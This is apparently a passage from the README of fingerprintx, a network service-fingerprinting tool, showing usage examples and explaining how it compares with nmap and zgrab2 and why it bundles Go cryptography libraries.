$ fingerprintx -l input.txt
http://praetorian.com:80
telnet://telehack.com:23
With more metadata output:
Nmap is the standard for network scanning. Why use `fingerprintx` instead of nmap? The two main reasons are:
- `fingerprintx` works smarter, not harder: the first plugin run against a server with port 8080 open is the http plugin. The default-service approach cuts down scanning time in the best case. Most of the time the services running on ports 80, 443, and 22 are http, https, and ssh, so that's what `fingerprintx` checks first.
- `fingerprintx` supports json output with the `--json` flag. Nmap supports numerous output options (normal, xml, grep), but they are often hard to parse and script appropriately. `fingerprintx`'s json output eases integration with other tools in processing pipelines.

Why is there a `third_party` folder that imports the Go cryptography libraries? The `ssh` fingerprinting module identifies the various cryptographic options supported by the server when collecting metadata during the handshake process. This makes use of a few unexported functions, which is why the Go cryptography libraries are included here with an export.go file.

Note that `fingerprintx` assumes the `target:port` input is open. If none of the ports are open there will be no output, as there are no services running on the targets.

The `zgrab2` command line usage (and use case) is slightly different from `fingerprintx`. For `zgrab2`, the protocol must be specified ahead of time: `echo praetorian.com | zgrab2 http -p 8000`, which assumes you already know what is running there. For `fingerprintx`, that is not the case: `echo praetorian.com:8000 | fingerprintx`. The "application layer" protocol scanning approach is very similar.

`fingerprintx` is the work of a lot of people, including our great intern class of 2022. Here is a list of contributors so far: